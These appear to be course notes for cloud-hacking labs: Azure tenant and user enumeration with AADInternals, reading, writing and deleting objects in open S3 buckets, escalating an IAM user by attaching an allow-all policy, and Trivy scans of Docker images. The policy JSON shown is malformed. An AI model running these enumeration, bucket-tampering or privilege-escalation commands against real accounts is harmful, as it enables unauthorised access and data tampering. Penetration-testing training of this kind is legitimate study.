Module 19 : Cloud Computing

Ethical hackers or pen testers use numerous tools and techniques to hack the target cloud platform. Recommended labs that will assist you in learning various cloud platform hacking techniques include:

1. Perform Reconnaissance on Azure

   • Azure reconnaissance with AADInternals

2. Exploit S3 buckets

   • Exploit open S3 buckets using AWS CLI

3. Perform privilege escalation to gain higher privileges

   • Escalate IAM user privileges by exploiting misconfigured user policy

4. Perform vulnerability assessment on Docker images

   • Vulnerability assessment on Docker images using Trivy

Lab 1: Perform Reconnaissance on Azure

Task 1: Azure Reconnaissance with AADInternals

## Installing AADInternals 
    Install-module AADInternals
    Import-module AADInternals

## Available Commands : 
1. Invoking Domains on Azure
     Invoke-AADIntReconAsOutsider -DomainName company.com | Format-table 
2. Invoking Usernames  :
     Invoke-AADIntUserEnumerationAsOutsider -UserName user@company.com  
3. Invoking Usernames over file:
     Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Normal
4. Login Information about thre domain :
     Get-AADIntLoginInformation -Domain company.com
5. Login Information of the user on azure:
     Get-AADIntLoginInformation -Domain user@company
6. Retrieve tenantID: 
     Get-AADIntTenantID -Domain company.com.
7. Get Registered domains on the tenant:
     Get-AADIntTenantDomains -Domain company.com

Or visit the following website : 
https://aadinternals.com/osint/ 

Lab 2: Exploit S3 Buckets

Task 1: Exploit Open S3 Buckets using AWS CLI

## Installing AWSCLI
    pip2 install awscli
    aws configure
        1. AWS Access Key ID
        2. AWS Secret Access Key
        3. Default region name
        4. Default output format
    This will be generated from the AWS Console

## CLI COMMANDS : 
1.  Listing Bucket contents : 
    aws s3 ls s3://[Bucket Name]
2. Moving data into the S3 bucket:
    aws s3 mv Hack.txt s3://[Bucker Name]
3. Removing data from the bucket:  
    aws s3 rm s3://[Bucket Name]/Hack.txt

Lab 3: Perform Privilege Escalation to Gain Higher Privileges

Task 1: Escalate IAM User Privileges by Exploiting Misconfigured User Policy

1. Creating UserPolicy

vim user-policy.json
"Version":"2012-10-17",

"Statement": [

    "Effect":"Allow",

    "Action":"*",

    "Resource":"*"

}
]

1. Creating Policies on AWS

aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json

1. Attaching policies to the user:

aws iam attach-user-policy --user-name [Target Username] --policy-arn arn:aws:iam::[Account ID]:policy/user-policy

1. List Attached users:

aws iam list-attached-user-policies --user-name [Target Username]

1. Other Available commands:

List of S3 buckets: aws s3api list-buckets --query "Buckets[].Name"

User Policies: aws iam list-user-policies

Role Policies: aws iam list-role-policies

Group policies: aws iam list-group-policies

Create user: aws iam create-user

Lab 4: Perform Vulnerability Assessment on Docker Images

Task 1: Vulnerability Assessment on Docker Images using Trivy

https://trivy.dev/latest/getting-started/installation/#__tabbed_2_1 | Trivy Installation

## Scanning Secure image "ubuntu"
docker pull ubuntu
trivy image ubuntu

## Scanning Vulnerable image "nginx:1.19.6"
docker pull nginx:1.19.6
trivy image nginx:1.19.6